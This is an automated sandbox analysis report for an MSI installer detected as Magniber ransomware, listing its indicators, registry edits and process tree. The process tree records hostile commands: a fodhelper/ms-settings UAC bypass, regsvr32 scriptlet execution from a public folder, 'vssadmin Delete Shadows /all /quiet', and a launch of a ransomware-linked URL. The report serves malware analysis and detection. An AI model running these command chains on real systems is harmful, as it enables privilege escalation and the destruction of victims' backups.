Analysis
-
max time kernel
114s -
max time network
107s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 12:11
Static task
static1
Behavioral task
behavioral1
Sample
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
Resource
win10v2004-20240508-en
General
-
Target
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
-
Size
96KB
-
MD5
42ad49ed99c0d41a820316309bc2c3b3
-
SHA1
f447a72b3cbea72e1b56fda8f44fd9f304b4474a
-
SHA256
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
-
SHA512
4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
SSDEEP
1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun
Malware Config
Signatures
-
Detect magniber ransomware 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2516-11-0x000002265C3F0000-0x000002265C3F3000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (86) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MsiExec.exedescription pid Process procid_target PID 4448 set thread context of 2516 4448 MsiExec.exe 44 PID 4448 set thread context of 2544 4448 MsiExec.exe 45 PID 4448 set thread context of 2764 4448 MsiExec.exe 48 -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc Process File created C:\Windows\Installer\e57786c.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{806B562E-D37E-4F22-8C47-582974C985AC} msiexec.exe File created C:\Windows\Installer\e57786e.msi msiexec.exe File opened for modification C:\Windows\Installer\e57786c.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI78F9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C45.tmp msiexec.exe -
Loads dropped DLL 1 IoCs
Processes:
MsiExec.exepid Process 4448 MsiExec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000eb40c78f8f3426de0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000eb40c78f0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900eb40c78f000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1deb40c78f000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000eb40c78f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid Process 5896 vssadmin.exe 5856 vssadmin.exe 5932 vssadmin.exe 6104 vssadmin.exe 6112 vssadmin.exe 1296 vssadmin.exe -
Modifies registry class 14 IoCs
Processes:
regsvr32.exeregsvr32.exesihost.exeregsvr32.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exepid Process 4652 msiexec.exe 4652 msiexec.exe 4448 MsiExec.exe 4448 MsiExec.exe 1012 msedge.exe 1012 msedge.exe 1464 msedge.exe 1464 msedge.exe 5172 identity_helper.exe 5172 identity_helper.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exepid Process 4448 MsiExec.exe 4448 MsiExec.exe 4448 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
Processes:
msedge.exepid Process 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exedescription pid Process Token: SeShutdownPrivilege 3796 msiexec.exe Token: SeIncreaseQuotaPrivilege 3796 msiexec.exe Token: SeSecurityPrivilege 4652 msiexec.exe Token: SeCreateTokenPrivilege 3796 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3796 msiexec.exe Token: SeLockMemoryPrivilege 3796 msiexec.exe Token: SeIncreaseQuotaPrivilege 3796 msiexec.exe Token: SeMachineAccountPrivilege 3796 msiexec.exe Token: SeTcbPrivilege 3796 msiexec.exe Token: SeSecurityPrivilege 3796 msiexec.exe Token: SeTakeOwnershipPrivilege 3796 msiexec.exe Token: SeLoadDriverPrivilege 3796 msiexec.exe Token: SeSystemProfilePrivilege 3796 msiexec.exe Token: SeSystemtimePrivilege 3796 msiexec.exe Token: SeProfSingleProcessPrivilege 3796 msiexec.exe Token: SeIncBasePriorityPrivilege 3796 msiexec.exe Token: SeCreatePagefilePrivilege 3796 msiexec.exe Token: SeCreatePermanentPrivilege 3796 msiexec.exe Token: SeBackupPrivilege 3796 msiexec.exe Token: SeRestorePrivilege 3796 msiexec.exe Token: SeShutdownPrivilege 3796 msiexec.exe Token: SeDebugPrivilege 3796 msiexec.exe Token: SeAuditPrivilege 3796 msiexec.exe Token: SeSystemEnvironmentPrivilege 3796 msiexec.exe Token: SeChangeNotifyPrivilege 3796 msiexec.exe Token: SeRemoteShutdownPrivilege 3796 msiexec.exe Token: SeUndockPrivilege 3796 msiexec.exe Token: SeSyncAgentPrivilege 3796 msiexec.exe Token: SeEnableDelegationPrivilege 3796 msiexec.exe Token: SeManageVolumePrivilege 3796 msiexec.exe Token: SeImpersonatePrivilege 3796 msiexec.exe Token: SeCreateGlobalPrivilege 3796 msiexec.exe Token: SeBackupPrivilege 3828 vssvc.exe Token: SeRestorePrivilege 3828 vssvc.exe Token: SeAuditPrivilege 3828 vssvc.exe Token: SeBackupPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
msiexec.exemsedge.exepid Process 3796 msiexec.exe 3796 msiexec.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid Process 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe 1464 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exedescription pid Process procid_target PID 4652 wrote to memory of 2000 4652 msiexec.exe 94 PID 4652 wrote to memory of 2000 4652 msiexec.exe 94 PID 4652 wrote to memory of 4448 4652 msiexec.exe 96 PID 4652 wrote to memory of 4448 4652 msiexec.exe 96 PID 2516 wrote to memory of 2224 2516 sihost.exe 97 PID 2516 wrote to memory of 2224 2516 sihost.exe 97 PID 2544 wrote to memory of 5008 2544 svchost.exe 98 PID 2544 wrote to memory of 5008 2544 svchost.exe 98 PID 2764 wrote to memory of 1672 2764 taskhostw.exe 100 PID 2764 wrote to memory of 1672 2764 taskhostw.exe 100 PID 4448 wrote to memory of 1672 4448 MsiExec.exe 100 PID 4448 wrote to memory of 1672 4448 MsiExec.exe 100 PID 1672 wrote to memory of 1464 1672 cmd.exe 102 PID 1672 wrote to memory of 1464 1672 cmd.exe 102 PID 1464 wrote to memory of 3000 1464 msedge.exe 103 PID 1464 wrote to memory of 3000 1464 msedge.exe 103 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 4776 1464 msedge.exe 104 PID 1464 wrote to memory of 1012 1464 msedge.exe 105 PID 1464 wrote to memory of 1012 1464 msedge.exe 105 PID 1464 wrote to memory of 5012 1464 msedge.exe 106 PID 1464 wrote to memory of 5012 1464 msedge.exe 106 PID 1464 wrote to memory of 5012 1464 msedge.exe 106 PID 1464 wrote to memory of 5012 1464 msedge.exe 106 PID 1464 wrote to memory of 5012 1464 msedge.exe 106 PID 1464 wrote to memory of 5012 1464 msedge.exe 106 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- Modifies registry class
PID:2224
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5704
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5832
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵PID:5984
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:1296
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5196
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5320
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵PID:5828
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5856
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- Modifies registry class
PID:5008
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5700
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5848
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵PID:5960
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:6112
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5256
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5672
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵PID:5700
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5932
-
-
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- Modifies registry class
PID:1672
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5716
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5840
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵PID:5972
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:6104
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5444
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5340
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵PID:5792
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5896
-
-
-
-
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3796
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:2000
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding DCB7D1486F40DA76AEDBF2B62B9106832⤵
- Suspicious use of SetThreadContext
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://ccec70b0766c18c0e048tbodbmuw.ofrisk.info/tbodbmuw^&2^&54351261^&86^&409^&22190413⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://ccec70b0766c18c0e048tbodbmuw.ofrisk.info/tbodbmuw&2&54351261&86&409&22190414⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb829f46f8,0x7ffb829f4708,0x7ffb829f47185⤵PID:3000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:25⤵PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:85⤵PID:5012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:15⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:15⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:15⤵PID:2724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:15⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:85⤵PID:1552
-
-
